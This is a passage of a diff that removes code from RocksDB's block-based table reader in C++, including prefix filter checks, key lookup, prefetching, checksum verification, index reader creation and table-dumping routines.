-    const InternalKeyComparator* icomparator, bool skip_filters, bool is_index,
-    std::unordered_map<uint64_t, CachableEntry<Block>>* block_map)
-    : TwoLevelIteratorState(table->rep_->ioptions.prefix_extractor != nullptr),
-      table_(table),
-      read_options_(read_options),
-      icomparator_(icomparator),
-      skip_filters_(skip_filters),
-      is_index_(is_index),
-      block_map_(block_map) {}
-
-InternalIterator*
-BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator(
-    const Slice& index_value) {
-  // Return a block iterator on the index partition
-  BlockHandle handle;
-  Slice input = index_value;
-  Status s = handle.DecodeFrom(&input);
-  auto rep = table_->rep_;
-  if (block_map_) {
-    auto block = block_map_->find(handle.offset());
-    // This is a possible scenario since block cache might not have had space
-    // for the partition
-    if (block != block_map_->end()) {
-      PERF_COUNTER_ADD(block_cache_hit_count, 1);
-      RecordTick(rep->ioptions.statistics, BLOCK_CACHE_INDEX_HIT);
-      RecordTick(rep->ioptions.statistics, BLOCK_CACHE_HIT);
-      Cache* block_cache = rep->table_options.block_cache.get();
-      assert(block_cache);
-      RecordTick(rep->ioptions.statistics, BLOCK_CACHE_BYTES_READ,
-                 block_cache->GetUsage(block->second.cache_handle));
-      return block->second.value->NewIterator(
-          &rep->internal_comparator, nullptr, true, rep->ioptions.statistics);
-    }
-  }
-  return NewDataBlockIterator(rep, read_options_, handle, nullptr, is_index_,
-                              s);
-}
-
-bool BlockBasedTable::BlockEntryIteratorState::PrefixMayMatch(
-    const Slice& internal_key) {
-  if (read_options_.total_order_seek || skip_filters_) {
-    return true;
-  }
-  return table_->PrefixMayMatch(internal_key);
-}
-
-bool BlockBasedTable::BlockEntryIteratorState::KeyReachedUpperBound(
-    const Slice& internal_key) {
-  bool reached_upper_bound = read_options_.iterate_upper_bound != nullptr &&
-                             icomparator_ != nullptr &&
-                             icomparator_->user_comparator()->Compare(
-                                 ExtractUserKey(internal_key),
-                                 *read_options_.iterate_upper_bound) >= 0;
-  TEST_SYNC_POINT_CALLBACK(
-      "BlockBasedTable::BlockEntryIteratorState::KeyReachedUpperBound",
-      &reached_upper_bound);
-  return reached_upper_bound;
-}
-
-// This will be broken if the user specifies an unusual implementation
-// of Options.comparator, or if the user specifies an unusual
-// definition of prefixes in BlockBasedTableOptions.filter_policy.
-// In particular, we require the following three properties:
-//
-// 1) key.starts_with(prefix(key))
-// 2) Compare(prefix(key), key) <= 0.
-// 3) If Compare(key1, key2) <= 0, then Compare(prefix(key1), prefix(key2)) <= 0
-//
-// Otherwise, this method guarantees no I/O will be incurred.
-//
-// REQUIRES: this method shouldn't be called while the DB lock is held.
-bool BlockBasedTable::PrefixMayMatch(const Slice& internal_key) {
-  if (!rep_->filter_policy) {
-    return true;
-  }
-
-  assert(rep_->ioptions.prefix_extractor != nullptr);
-  auto user_key = ExtractUserKey(internal_key);
-  if (!rep_->ioptions.prefix_extractor->InDomain(user_key) ||
-      rep_->table_properties->prefix_extractor_name.compare(
-          rep_->ioptions.prefix_extractor->Name()) != 0) {
-    return true;
-  }
-  auto prefix = rep_->ioptions.prefix_extractor->Transform(user_key);
-
-  bool may_match = true;
-  Status s;
-
-  // First, try check with full filter
-  auto filter_entry = GetFilter();
-  FilterBlockReader* filter = filter_entry.value;
-  if (filter != nullptr) {
-    if (!filter->IsBlockBased()) {
-      const Slice* const const_ikey_ptr = &internal_key;
-      may_match =
-          filter->PrefixMayMatch(prefix, kNotValid, false, const_ikey_ptr);
-    } else {
-      InternalKey internal_key_prefix(prefix, kMaxSequenceNumber, kTypeValue);
-      auto internal_prefix = internal_key_prefix.Encode();
-
-      // To prevent any io operation in this method, we set `read_tier` to make
-      // sure we always read index or filter only when they have already been
-      // loaded to memory.
-      ReadOptions no_io_read_options;
-      no_io_read_options.read_tier = kBlockCacheTier;
-
-      // Then, try find it within each block
-      unique_ptr<InternalIterator> iiter(NewIndexIterator(no_io_read_options));
-      iiter->Seek(internal_prefix);
-
-      if (!iiter->Valid()) {
-        // we're past end of file
-        // if it's incomplete, it means that we avoided I/O
-        // and we're not really sure that we're past the end
-        // of the file
-        may_match = iiter->status().IsIncomplete();
-      } else if (ExtractUserKey(iiter->key())
-                     .starts_with(ExtractUserKey(internal_prefix))) {
-        // we need to check for this subtle case because our only
-        // guarantee is that "the key is a string >= last key in that data
-        // block" according to the doc/table_format.txt spec.
-        //
-        // Suppose iiter->key() starts with the desired prefix; it is not
-        // necessarily the case that the corresponding data block will
-        // contain the prefix, since iiter->key() need not be in the
-        // block.  However, the next data block may contain the prefix, so
-        // we return true to play it safe.
-        may_match = true;
-      } else if (filter->IsBlockBased()) {
-        // iiter->key() does NOT start with the desired prefix.  Because
-        // Seek() finds the first key that is >= the seek target, this
-        // means that iiter->key() > prefix.  Thus, any data blocks coming
-        // after the data block corresponding to iiter->key() cannot
-        // possibly contain the key.  Thus, the corresponding data block
-        // is the only on could potentially contain the prefix.
-        Slice handle_value = iiter->value();
-        BlockHandle handle;
-        s = handle.DecodeFrom(&handle_value);
-        assert(s.ok());
-        may_match = filter->PrefixMayMatch(prefix, handle.offset());
-      }
-    }
-  }
-
-  Statistics* statistics = rep_->ioptions.statistics;
-  RecordTick(statistics, BLOOM_FILTER_PREFIX_CHECKED);
-  if (!may_match) {
-    RecordTick(statistics, BLOOM_FILTER_PREFIX_USEFUL);
-  }
-
-  // if rep_->filter_entry is not set, we should call Release(); otherwise
-  // don't call, in this case we have a local copy in rep_->filter_entry,
-  // it's pinned to the cache and will be released in the destructor
-  if (!rep_->filter_entry.IsSet()) {
-    filter_entry.Release(rep_->table_options.block_cache.get());
-  }
-
-  return may_match;
-}
-
-InternalIterator* BlockBasedTable::NewIterator(const ReadOptions& read_options,
-                                               Arena* arena,
-                                               bool skip_filters) {
-  return NewTwoLevelIterator(
-      new BlockEntryIteratorState(this, read_options,
-                                  &rep_->internal_comparator, skip_filters),
-      NewIndexIterator(read_options), arena);
-}
-
-InternalIterator* BlockBasedTable::NewRangeTombstoneIterator(
-    const ReadOptions& read_options) {
-  if (rep_->range_del_handle.IsNull()) {
-    // The block didn't exist, nullptr indicates no range tombstones.
-    return nullptr;
-  }
-  if (rep_->range_del_entry.cache_handle != nullptr) {
-    // We have a handle to an uncompressed block cache entry that's held for
-    // this table's lifetime. Increment its refcount before returning an
-    // iterator based on it since the returned iterator may outlive this table
-    // reader.
-    assert(rep_->range_del_entry.value != nullptr);
-    Cache* block_cache = rep_->table_options.block_cache.get();
-    assert(block_cache != nullptr);
-    if (block_cache->Ref(rep_->range_del_entry.cache_handle)) {
-      auto iter = rep_->range_del_entry.value->NewIterator(
-          &rep_->internal_comparator, nullptr /* iter */,
-          true /* total_order_seek */, rep_->ioptions.statistics);
-      iter->RegisterCleanup(&ReleaseCachedEntry, block_cache,
-                            rep_->range_del_entry.cache_handle);
-      return iter;
-    }
-  }
-  std::string str;
-  rep_->range_del_handle.EncodeTo(&str);
-  // The meta-block exists but isn't in uncompressed block cache (maybe because
-  // it is disabled), so go through the full lookup process.
-  return NewDataBlockIterator(rep_, read_options, Slice(str));
-}
-
-bool BlockBasedTable::FullFilterKeyMayMatch(const ReadOptions& read_options,
-                                            FilterBlockReader* filter,
-                                            const Slice& internal_key,
-                                            const bool no_io) const {
-  if (filter == nullptr || filter->IsBlockBased()) {
-    return true;
-  }
-  Slice user_key = ExtractUserKey(internal_key);
-  const Slice* const const_ikey_ptr = &internal_key;
-  if (filter->whole_key_filtering()) {
-    return filter->KeyMayMatch(user_key, kNotValid, no_io, const_ikey_ptr);
-  }
-  if (!read_options.total_order_seek && rep_->ioptions.prefix_extractor &&
-      rep_->table_properties->prefix_extractor_name.compare(
-          rep_->ioptions.prefix_extractor->Name()) == 0 &&
-      rep_->ioptions.prefix_extractor->InDomain(user_key) &&
-      !filter->PrefixMayMatch(
-          rep_->ioptions.prefix_extractor->Transform(user_key), kNotValid,
-          false, const_ikey_ptr)) {
-    return false;
-  }
-  return true;
-}
-
-Status BlockBasedTable::Get(const ReadOptions& read_options, const Slice& key,
-                            GetContext* get_context, bool skip_filters) {
-  Status s;
-  const bool no_io = read_options.read_tier == kBlockCacheTier;
-  CachableEntry<FilterBlockReader> filter_entry;
-  if (!skip_filters) {
-    filter_entry = GetFilter(/*prefetch_buffer*/ nullptr,
-                             read_options.read_tier == kBlockCacheTier);
-  }
-  FilterBlockReader* filter = filter_entry.value;
-
-  // First check the full filter
-  // If full filter not useful, Then go into each block
-  if (!FullFilterKeyMayMatch(read_options, filter, key, no_io)) {
-    RecordTick(rep_->ioptions.statistics, BLOOM_FILTER_USEFUL);
-  } else {
-    BlockIter iiter_on_stack;
-    auto iiter = NewIndexIterator(read_options, &iiter_on_stack);
-    std::unique_ptr<InternalIterator> iiter_unique_ptr;
-    if (iiter != &iiter_on_stack) {
-      iiter_unique_ptr.reset(iiter);
-    }
-
-    bool done = false;
-    for (iiter->Seek(key); iiter->Valid() && !done; iiter->Next()) {
-      Slice handle_value = iiter->value();
-
-      BlockHandle handle;
-      bool not_exist_in_filter =
-          filter != nullptr && filter->IsBlockBased() == true &&
-          handle.DecodeFrom(&handle_value).ok() &&
-          !filter->KeyMayMatch(ExtractUserKey(key), handle.offset(), no_io);
-
-      if (not_exist_in_filter) {
-        // Not found
-        // TODO: think about interaction with Merge. If a user key cannot
-        // cross one data block, we should be fine.
-        RecordTick(rep_->ioptions.statistics, BLOOM_FILTER_USEFUL);
-        break;
-      } else {
-        BlockIter biter;
-        NewDataBlockIterator(rep_, read_options, iiter->value(), &biter);
-
-        if (read_options.read_tier == kBlockCacheTier &&
-            biter.status().IsIncomplete()) {
-          // couldn't get block from block_cache
-          // Update Saver.state to Found because we are only looking for whether
-          // we can guarantee the key is not there when "no_io" is set
-          get_context->MarkKeyMayExist();
-          break;
-        }
-        if (!biter.status().ok()) {
-          s = biter.status();
-          break;
-        }
-
-        // Call the *saver function on each entry/block until it returns false
-        for (biter.Seek(key); biter.Valid(); biter.Next()) {
-          ParsedInternalKey parsed_key;
-          if (!ParseInternalKey(biter.key(), &parsed_key)) {
-            s = Status::Corruption(Slice());
-          }
-
-          if (!get_context->SaveValue(parsed_key, biter.value(), &biter)) {
-            done = true;
-            break;
-          }
-        }
-        s = biter.status();
-      }
-      if (done) {
-        // Avoid the extra Next which is expensive in two-level indexes
-        break;
-      }
-    }
-    if (s.ok()) {
-      s = iiter->status();
-    }
-  }
-
-  // if rep_->filter_entry is not set, we should call Release(); otherwise
-  // don't call, in this case we have a local copy in rep_->filter_entry,
-  // it's pinned to the cache and will be released in the destructor
-  if (!rep_->filter_entry.IsSet()) {
-    filter_entry.Release(rep_->table_options.block_cache.get());
-  }
-  return s;
-}
-
-Status BlockBasedTable::Prefetch(const Slice* const begin,
-                                 const Slice* const end) {
-  auto& comparator = rep_->internal_comparator;
-  // pre-condition
-  if (begin && end && comparator.Compare(*begin, *end) > 0) {
-    return Status::InvalidArgument(*begin, *end);
-  }
-
-  BlockIter iiter_on_stack;
-  auto iiter = NewIndexIterator(ReadOptions(), &iiter_on_stack);
-  std::unique_ptr<InternalIterator> iiter_unique_ptr;
-  if (iiter != &iiter_on_stack) {
-    iiter_unique_ptr = std::unique_ptr<InternalIterator>(iiter);
-  }
-
-  if (!iiter->status().ok()) {
-    // error opening index iterator
-    return iiter->status();
-  }
-
-  // indicates if we are on the last page that need to be pre-fetched
-  bool prefetching_boundary_page = false;
-
-  for (begin ? iiter->Seek(*begin) : iiter->SeekToFirst(); iiter->Valid();
-       iiter->Next()) {
-    Slice block_handle = iiter->value();
-
-    if (end && comparator.Compare(iiter->key(), *end) >= 0) {
-      if (prefetching_boundary_page) {
-        break;
-      }
-
-      // The index entry represents the last key in the data block.
-      // We should load this page into memory as well, but no more
-      prefetching_boundary_page = true;
-    }
-
-    // Load the block specified by the block_handle into the block cache
-    BlockIter biter;
-    NewDataBlockIterator(rep_, ReadOptions(), block_handle, &biter);
-
-    if (!biter.status().ok()) {
-      // there was an unexpected error while pre-fetching
-      return biter.status();
-    }
-  }
-
-  return Status::OK();
-}
-
-Status BlockBasedTable::VerifyChecksum() {
-  Status s;
-  // Check Meta blocks
-  std::unique_ptr<Block> meta;
-  std::unique_ptr<InternalIterator> meta_iter;
-  s = ReadMetaBlock(rep_, nullptr /* prefetch buffer */, &meta, &meta_iter);
-  if (s.ok()) {
-    s = VerifyChecksumInBlocks(meta_iter.get());
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    return s;
-  }
-  // Check Data blocks
-  BlockIter iiter_on_stack;
-  InternalIterator* iiter = NewIndexIterator(ReadOptions(), &iiter_on_stack);
-  std::unique_ptr<InternalIterator> iiter_unique_ptr;
-  if (iiter != &iiter_on_stack) {
-    iiter_unique_ptr = std::unique_ptr<InternalIterator>(iiter);
-  }
-  if (!iiter->status().ok()) {
-    // error opening index iterator
-    return iiter->status();
-  }
-  s = VerifyChecksumInBlocks(iiter);
-  return s;
-}
-
-Status BlockBasedTable::VerifyChecksumInBlocks(InternalIterator* index_iter) {
-  Status s;
-  for (index_iter->SeekToFirst(); index_iter->Valid(); index_iter->Next()) {
-    s = index_iter->status();
-    if (!s.ok()) {
-      break;
-    }
-    BlockHandle handle;
-    Slice input = index_iter->value();
-    s = handle.DecodeFrom(&input);
-    if (!s.ok()) {
-      break;
-    }
-    BlockContents contents;
-    s = ReadBlockContents(rep_->file.get(), nullptr /* prefetch buffer */,
-                          rep_->footer, ReadOptions(), handle, &contents,
-                          rep_->ioptions, false /* decompress */,
-                          Slice() /*compression dict*/,
-                          rep_->persistent_cache_options);
-    if (!s.ok()) {
-      break;
-    }
-  }
-  return s;
-}
-
-bool BlockBasedTable::TEST_KeyInCache(const ReadOptions& options,
-                                      const Slice& key) {
-  std::unique_ptr<InternalIterator> iiter(NewIndexIterator(options));
-  iiter->Seek(key);
-  assert(iiter->Valid());
-  CachableEntry<Block> block;
-
-  BlockHandle handle;
-  Slice input = iiter->value();
-  Status s = handle.DecodeFrom(&input);
-  assert(s.ok());
-  Cache* block_cache = rep_->table_options.block_cache.get();
-  assert(block_cache != nullptr);
-
-  char cache_key_storage[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  Slice cache_key =
-      GetCacheKey(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                  handle, cache_key_storage);
-  Slice ckey;
-
-  s = GetDataBlockFromCache(
-      cache_key, ckey, block_cache, nullptr, rep_->ioptions, options, &block,
-      rep_->table_options.format_version,
-      rep_->compression_dict_block ? rep_->compression_dict_block->data
-                                   : Slice(),
-      0 /* read_amp_bytes_per_bit */);
-  assert(s.ok());
-  bool in_cache = block.value != nullptr;
-  if (in_cache) {
-    ReleaseCachedEntry(block_cache, block.cache_handle);
-  }
-  return in_cache;
-}
-
-// REQUIRES: The following fields of rep_ should have already been populated:
-//  1. file
-//  2. index_handle,
-//  3. options
-//  4. internal_comparator
-//  5. index_type
-Status BlockBasedTable::CreateIndexReader(
-    FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader,
-    InternalIterator* preloaded_meta_index_iter, int level) {
-  // Some old version of block-based tables don't have index type present in
-  // table properties. If that's the case we can safely use the kBinarySearch.
-  auto index_type_on_file = BlockBasedTableOptions::kBinarySearch;
-  if (rep_->table_properties) {
-    auto& props = rep_->table_properties->user_collected_properties;
-    auto pos = props.find(BlockBasedTablePropertyNames::kIndexType);
-    if (pos != props.end()) {
-      index_type_on_file = static_cast<BlockBasedTableOptions::IndexType>(
-          DecodeFixed32(pos->second.c_str()));
-    }
-  }
-
-  auto file = rep_->file.get();
-  const InternalKeyComparator* icomparator = &rep_->internal_comparator;
-  const Footer& footer = rep_->footer;
-  if (index_type_on_file == BlockBasedTableOptions::kHashSearch &&
-      rep_->ioptions.prefix_extractor == nullptr) {
-    ROCKS_LOG_WARN(rep_->ioptions.info_log,
-                   "BlockBasedTableOptions::kHashSearch requires "
-                   "options.prefix_extractor to be set."
-                   " Fall back to binary search index.");
-    index_type_on_file = BlockBasedTableOptions::kBinarySearch;
-  }
-
-  switch (index_type_on_file) {
-    case BlockBasedTableOptions::kTwoLevelIndexSearch: {
-      return PartitionIndexReader::Create(
-          this, file, prefetch_buffer, footer, footer.index_handle(),
-          rep_->ioptions, icomparator, index_reader,
-          rep_->persistent_cache_options, level);
-    }
-    case BlockBasedTableOptions::kBinarySearch: {
-      return BinarySearchIndexReader::Create(
-          file, prefetch_buffer, footer, footer.index_handle(), rep_->ioptions,
-          icomparator, index_reader, rep_->persistent_cache_options);
-    }
-    case BlockBasedTableOptions::kHashSearch: {
-      std::unique_ptr<Block> meta_guard;
-      std::unique_ptr<InternalIterator> meta_iter_guard;
-      auto meta_index_iter = preloaded_meta_index_iter;
-      if (meta_index_iter == nullptr) {
-        auto s =
-            ReadMetaBlock(rep_, prefetch_buffer, &meta_guard, &meta_iter_guard);
-        if (!s.ok()) {
-          // we simply fall back to binary search in case there is any
-          // problem with prefix hash index loading.
-          ROCKS_LOG_WARN(rep_->ioptions.info_log,
-                         "Unable to read the metaindex block."
-                         " Fall back to binary search index.");
-          return BinarySearchIndexReader::Create(
-              file, prefetch_buffer, footer, footer.index_handle(),
-              rep_->ioptions, icomparator, index_reader,
-              rep_->persistent_cache_options);
-        }
-        meta_index_iter = meta_iter_guard.get();
-      }
-
-      return HashIndexReader::Create(
-          rep_->internal_prefix_transform.get(), footer, file, prefetch_buffer,
-          rep_->ioptions, icomparator, footer.index_handle(), meta_index_iter,
-          index_reader, rep_->hash_index_allow_collision,
-          rep_->persistent_cache_options);
-    }
-    default: {
-      std::string error_message =
-          "Unrecognized index type: " + ToString(index_type_on_file);
-      return Status::InvalidArgument(error_message.c_str());
-    }
-  }
-}
-
-uint64_t BlockBasedTable::ApproximateOffsetOf(const Slice& key) {
-  unique_ptr<InternalIterator> index_iter(NewIndexIterator(ReadOptions()));
-
-  index_iter->Seek(key);
-  uint64_t result;
-  if (index_iter->Valid()) {
-    BlockHandle handle;
-    Slice input = index_iter->value();
-    Status s = handle.DecodeFrom(&input);
-    if (s.ok()) {
-      result = handle.offset();
-    } else {
-      // Strange: we can't decode the block handle in the index block.
-      // We'll just return the offset of the metaindex block, which is
-      // close to the whole file size for this case.
-      result = rep_->footer.metaindex_handle().offset();
-    }
-  } else {
-    // key is past the last key in the file. If table_properties is not
-    // available, approximate the offset by returning the offset of the
-    // metaindex block (which is right near the end of the file).
-    result = 0;
-    if (rep_->table_properties) {
-      result = rep_->table_properties->data_size;
-    }
-    // table_properties is not present in the table.
-    if (result == 0) {
-      result = rep_->footer.metaindex_handle().offset();
-    }
-  }
-  return result;
-}
-
-bool BlockBasedTable::TEST_filter_block_preloaded() const {
-  return rep_->filter != nullptr;
-}
-
-bool BlockBasedTable::TEST_index_reader_preloaded() const {
-  return rep_->index_reader != nullptr;
-}
-
-Status BlockBasedTable::GetKVPairsFromDataBlocks(
-    std::vector<KVPairBlock>* kv_pair_blocks) {
-  std::unique_ptr<InternalIterator> blockhandles_iter(
-      NewIndexIterator(ReadOptions()));
-
-  Status s = blockhandles_iter->status();
-  if (!s.ok()) {
-    // Cannot read Index Block
-    return s;
-  }
-
-  for (blockhandles_iter->SeekToFirst(); blockhandles_iter->Valid();
-       blockhandles_iter->Next()) {
-    s = blockhandles_iter->status();
-
-    if (!s.ok()) {
-      break;
-    }
-
-    std::unique_ptr<InternalIterator> datablock_iter;
-    datablock_iter.reset(
-        NewDataBlockIterator(rep_, ReadOptions(), blockhandles_iter->value()));
-    s = datablock_iter->status();
-
-    if (!s.ok()) {
-      // Error reading the block - Skipped
-      continue;
-    }
-
-    KVPairBlock kv_pair_block;
-    for (datablock_iter->SeekToFirst(); datablock_iter->Valid();
-         datablock_iter->Next()) {
-      s = datablock_iter->status();
-      if (!s.ok()) {
-        // Error reading the block - Skipped
-        break;
-      }
-      const Slice& key = datablock_iter->key();
-      const Slice& value = datablock_iter->value();
-      std::string key_copy = std::string(key.data(), key.size());
-      std::string value_copy = std::string(value.data(), value.size());
-
-      kv_pair_block.push_back(
-          std::make_pair(std::move(key_copy), std::move(value_copy)));
-    }
-    kv_pair_blocks->push_back(std::move(kv_pair_block));
-  }
-  return Status::OK();
-}
-
-Status BlockBasedTable::DumpTable(WritableFile* out_file) {
-  // Output Footer
-  out_file->Append(
-      "Footer Details:\n"
-      "--------------------------------------\n"
-      "  ");
-  out_file->Append(rep_->footer.ToString().c_str());
-  out_file->Append("\n");
-
-  // Output MetaIndex
-  out_file->Append(
-      "Metaindex Details:\n"
-      "--------------------------------------\n");
-  std::unique_ptr<Block> meta;
-  std::unique_ptr<InternalIterator> meta_iter;
-  Status s =
-      ReadMetaBlock(rep_, nullptr /* prefetch_buffer */, &meta, &meta_iter);
-  if (s.ok()) {
-    for (meta_iter->SeekToFirst(); meta_iter->Valid(); meta_iter->Next()) {
-      s = meta_iter->status();
-      if (!s.ok()) {
-        return s;
-      }
-      if (meta_iter->key() == rocksdb::kPropertiesBlock) {
-        out_file->Append("  Properties block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      } else if (meta_iter->key() == rocksdb::kCompressionDictBlock) {
-        out_file->Append("  Compression dictionary block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      } else if (strstr(meta_iter->key().ToString().c_str(),
-                        "filter.rocksdb.") != nullptr) {
-        out_file->Append("  Filter block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      } else if (meta_iter->key() == rocksdb::kRangeDelBlock) {
-        out_file->Append("  Range deletion block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      }
-    }
-    out_file->Append("\n");
-  } else {
-    return s;
-  }
-
-  // Output TableProperties
-  const rocksdb::TableProperties* table_properties;
-  table_properties = rep_->table_properties.get();
-
-  if (table_properties != nullptr) {
-    out_file->Append(
-        "Table Properties:\n"
-        "--------------------------------------\n"
-        "  ");
-    out_file->Append(table_properties->ToString("\n  ", ": ").c_str());
-    out_file->Append("\n");
-  }
-
-  // Output Filter blocks
-  if (!rep_->filter && !table_properties->filter_policy_name.empty()) {
-    // Support only BloomFilter as off now
-    rocksdb::BlockBasedTableOptions table_options;
-    table_options.filter_policy.reset(rocksdb::NewBloomFilterPolicy(1));
-    if (table_properties->filter_policy_name.compare(
-            table_options.filter_policy->Name()) == 0) {
-      std::string filter_block_key = kFilterBlockPrefix;
-      filter_block_key.append(table_properties->filter_policy_name);
-      BlockHandle handle;
-      if (FindMetaBlock(meta_iter.get(), filter_block_key, &handle).ok()) {
-        BlockContents block;
-        if (ReadBlockContents(rep_->file.get(), nullptr /* prefetch_buffer */,
-                              rep_->footer, ReadOptions(), handle, &block,
-                              rep_->ioptions, false /*decompress*/,
-                              Slice() /*compression dict*/,
-                              rep_->persistent_cache_options)
-                .ok()) {
-          rep_->filter.reset(new BlockBasedFilterBlockReader(
-              rep_->ioptions.prefix_extractor, table_options,
-              table_options.whole_key_filtering, std::move(block),
-              rep_->ioptions.statistics));
-        }
-      }
-    }
-  }
-  if (rep_->filter) {
-    out_file->Append(
-        "Filter Details:\n"
-        "--------------------------------------\n"
-        "  ");
-    out_file->Append(rep_->filter->ToString().c_str());
-    out_file->Append("\n");
-  }
-
-  // Output Index block
-  s = DumpIndexBlock(out_file);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Output compression dictionary
-  if (rep_->compression_dict_block != nullptr) {
-    auto compression_dict = rep_->compression_dict_block->data;
-    out_file->Append(
-        "Compression Dictionary:\n"
-        "--------------------------------------\n");
-    out_file->Append("  size (bytes): ");
-    out_file->Append(rocksdb::ToString(compression_dict.size()));
-    out_file->Append("\n\n");
-    out_file->Append("  HEX    ");
-    out_file->Append(compression_dict.ToString(true).c_str());
-    out_file->Append("\n\n");
-  }
-
-  // Output range deletions block
-  auto* range_del_iter = NewRangeTombstoneIterator(ReadOptions());
-  if (range_del_iter != nullptr) {
-    range_del_iter->SeekToFirst();
-    if (range_del_iter->Valid()) {
-      out_file->Append(
-          "Range deletions:\n"
-          "--------------------------------------\n"
-          "  ");
-      for (; range_del_iter->Valid(); range_del_iter->Next()) {
-        DumpKeyValue(range_del_iter->key(), range_del_iter->value(), out_file);
-      }
-      out_file->Append("\n");
-    }
-    delete range_del_iter;
-  }
-  // Output Data blocks
-  s = DumpDataBlocks(out_file);
-
-  return s;
-}
-
-void BlockBasedTable::Close() {
-  if (rep_->closed) {
-    return;
-  }
-  rep_->filter_entry.Release(rep_->table_options.block_cache.get());
-  rep_->index_entry.Release(rep_->table_options.block_cache.get());
-  rep_->range_del_entry.Release(rep_->table_options.block_cache.get());
-  // cleanup index and filter blocks to avoid accessing dangling pointer
-  if (!rep_->table_options.no_block_cache) {
-    char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-    // Get the filter block key
-    auto key = GetCacheKey(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                           rep_->filter_handle, cache_key);
-    rep_->table_options.block_cache.get()->Erase(key);
-    // Get the index block key
-    key = GetCacheKeyFromOffset(rep_->cache_key_prefix,
-                                rep_->cache_key_prefix_size,
-                                rep_->dummy_index_reader_offset, cache_key);
-    rep_->table_options.block_cache.get()->Erase(key);
-  }
-  rep_->closed = true;
-}
-
-Status BlockBasedTable::DumpIndexBlock(WritableFile* out_file) {
-  out_file->Append(
-      "Index Details:\n"
-      "--------------------------------------\n");
-
-  std::unique_ptr<InternalIterator> blockhandles_iter(
-      NewIndexIterator(ReadOptions()));
-  Status s = blockhandles_iter->status();
-  if (!s.ok()) {
-    out_file->Append("Can not read Index Block \n\n");
-    return s;
-  }
-
-  out_file->Append("  Block key hex dump: Data block handle\n");
-  out_file->Append("  Block key ascii\n\n");
-  for (blockhandles_iter->SeekToFirst(); blockhandles_iter->Valid();
-       blockhandles_iter->Next()) {
-    s = blockhandles_iter->status();
-    if (!s.ok()) {
-      break;
-    }
-    Slice key = blockhandles_iter->key();
-    InternalKey ikey;
-    ikey.DecodeFrom(key);
-
-    out_file->Append("  HEX    ");
-    out_file->Append(ikey.user_key().ToString(true).c_str());
-    out_file->Append(": ");
-    out_file->Append(blockhandles_iter->value().ToString(true).c_str());
-    out_file->Append("\n");
-
-    std::string str_key = ikey.user_key().ToString();
-    std::string res_key("");
-    char cspace = ' ';
-    for (size_t i = 0; i < str_key.size(); i++) {
-      res_key.append(&str_key[i], 1);
-      res_key.append(1, cspace);
-    }
-    out_file->Append("  ASCII  ");
-    out_file->Append(res_key.c_str());
-    out_file->Append("\n  ------\n");
-  }
-  out_file->Append("\n");
-  return Status::OK();
-}
-
-Status BlockBasedTable::DumpDataBlocks(WritableFile* out_file) {
-  std::unique_ptr<InternalIterator> blockhandles_iter(
-      NewIndexIterator(ReadOptions()));
-  Status s = blockhandles_iter->status();
-  if (!s.ok()) {
-    out_file->Append("Can not read Index Block \n\n");
-    return s;
-  }
-
-  uint64_t datablock_size_min = std::numeric_limits<uint64_t>::max();
-  uint64_t datablock_size_max = 0;
-  uint64_t datablock_size_sum = 0;
-
-  size_t block_id = 1;
-  for (blockhandles_iter->SeekToFirst(); blockhandles_iter->Valid();
-       block_id++, blockhandles_iter->Next()) {
-    s = blockhandles_iter->status();
-    if (!s.ok()) {
-      break;
-    }
-
-    Slice bh_val = blockhandles_iter->value();
-    BlockHandle bh;
-    bh.DecodeFrom(&bh_val);
-    uint64_t datablock_size = bh.size();
-    datablock_size_min = std::min(datablock_size_min, datablock_size);
-    datablock_size_max = std::max(datablock_size_max, datablock_size);
-    datablock_size_sum += datablock_size;
-
-    out_file->Append("Data Block # ");
-    out_file->Append(rocksdb::ToString(block_id));
-    out_file->Append(" @ ");
-    out_file->Append(blockhandles_iter->value().ToString(true).c_str());
-    out_file->Append("\n");
-    out_file->Append("--------------------------------------\n");
-
-    std::unique_ptr<InternalIterator> datablock_iter;
-    datablock_iter.reset(
-        NewDataBlockIterator(rep_, ReadOptions(), blockhandles_iter->value()));
-    s = datablock_iter->status();
-
-    if (!s.ok()) {
-      out_file->Append("Error reading the block - Skipped \n\n");
-      continue;
-    }
-
-    for (datablock_iter->SeekToFirst(); datablock_iter->Valid();
-         datablock_iter->Next()) {
-      s = datablock_iter->status();
-      if (!s.ok()) {
-        out_file->Append("Error reading the block - Skipped \n");
-        break;
-      }
-      DumpKeyValue(datablock_iter->key(), datablock_iter->value(), out_file);
-    }
-    out_file->Append("\n");
-  }
-
-  uint64_t num_datablocks = block_id - 1;
-  if (num_datablocks) {
-    double datablock_size_avg =
-        static_cast<double>(datablock_size_sum) / num_datablocks;
-    out_file->Append("Data Block Summary:\n");
-    out_file->Append("--------------------------------------");
-    out_file->Append("\n  # data blocks: ");
-    out_file->Append(rocksdb::ToString(num_datablocks));
-    out_file->Append("\n  min data block size: ");
-    out_file->Append(rocksdb::ToString(datablock_size_min));
-    out_file->Append("\n  max data block size: ");
-    out_file->Append(rocksdb::ToString(datablock_size_max));
-    out_file->Append("\n  avg data block size: ");
-    out_file->Append(rocksdb::ToString(datablock_size_avg));
-    out_file->Append("\n");
-  }
-
-  return Status::OK();
-}
-
-void BlockBasedTable::DumpKeyValue(const Slice& key, const Slice& value,
-                                   WritableFile* out_file) {
-  InternalKey ikey;
-  ikey.DecodeFrom(key);
-
-  out_file->Append("  HEX    ");
-  out_file->Append(ikey.user_key().ToString(true).c_str());
-  out_file->Append(": ");
-  out_file->Append(value.ToString(true).c_str());
-  out_file->Append("\n");
-
-  std::string str_key = ikey.user_key().ToString();
-  std::string str_value = value.ToString();
-  std::string res_key(""), res_value("");
-  char cspace = ' ';
-  for (size_t i = 0; i < str_key.size(); i++) {
-    res_key.append(&str_key[i], 1);
-    res_key.append(1, cspace);
-  }
